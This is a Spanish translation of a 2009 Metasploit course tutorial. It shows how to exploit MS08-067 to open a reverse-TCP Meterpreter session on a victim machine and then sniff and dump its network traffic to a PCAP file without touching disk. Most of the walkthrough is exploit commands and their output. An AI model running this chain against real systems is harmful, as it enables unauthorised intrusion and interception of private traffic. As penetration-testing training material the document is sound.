Packet Sniffing con Meterpreter
De www.metasploit-es.com.ar
Escuchando paquetes con Meterpreter
En el momento de escribir los tutoriales de este curso, H.D. Moore lanzó una nueva función para Metasploit Framework que es muy poderosa en todos los sentidos. Meterpreter tiene ahora la capacidad de escuchar paquetes (packet sniff) en el host remoto sin tocar el disco duro. Esto es especialmente útil si queremos saber y controlar los tipos de información que se están enviando, y aún mejor, este es probablemente el inicio de varios módulos auxiliares, que en última instancia, busca los datos mas sensibles dentro de los archivos de captura. El modulo Sniffer puede almacenar hasta 200.000 paquetes en el buffer y también los exporta al formato standard PCAP, que nos permite leer y procesarlos en el psnuffle, el dsniff, el wireshark, entre otros.
Bueno... En primer lugar disparamos nuestro exploit hacia nuestra victimiza, y aumentaremos el nivel para invertir a Meterpreter.
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.211.55.126 msf exploit(ms08_067_netapi) > set RHOST 10.10.1.119 msf exploit(ms08_067_netapi) > exploitBasically [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.119:1921)
Desde aquí iniciamos el sniffer en la interfaz 2 y comenzamos a recoger paquetes. A continuación guarda el resultado del sniffer en /tmp/all.cap .
meterpreter > use sniffer Loading extension sniffer...success. meterpreter > help Sniffer Commands ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data sniffer_interfaces List all remote sniffable interfaces sniffer_start Capture packets on a previously opened interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet captures on the specified interface meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) meterpreter > sniffer_start 1 [*] Capture started on interface 1 (200000 packet buffer) meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 19 packets to PCAP file /tmp/all.cap meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 199 packets to PCAP file /tmp/all.cap
Ahora podemos utilizar nuestro parser preferido o alguna herramienta de análisis de paquetes PCAP para revisar la información interceptada.
El sniffer de Meterpreter utiliza el MicroOLAP Packet Sniffer SDK. Este puede rastrear los paquetes de la máquina víctima, sin tener que instalar ningún driver o escribir en los archivos del sistema. El módulo es lo suficientemente inteligente para darse cuenta de su propio tráfico, así pues se eliminara automáticamente el tráfico de la interactividad de Meterpreter. Además los pipes de Meterpreter mueven toda la información a través de un túnel SSL / TLS y es totalmente encryptada.
© Offensive Security 2009
Original by www.offensive-security.com Traslated by FreeInfo
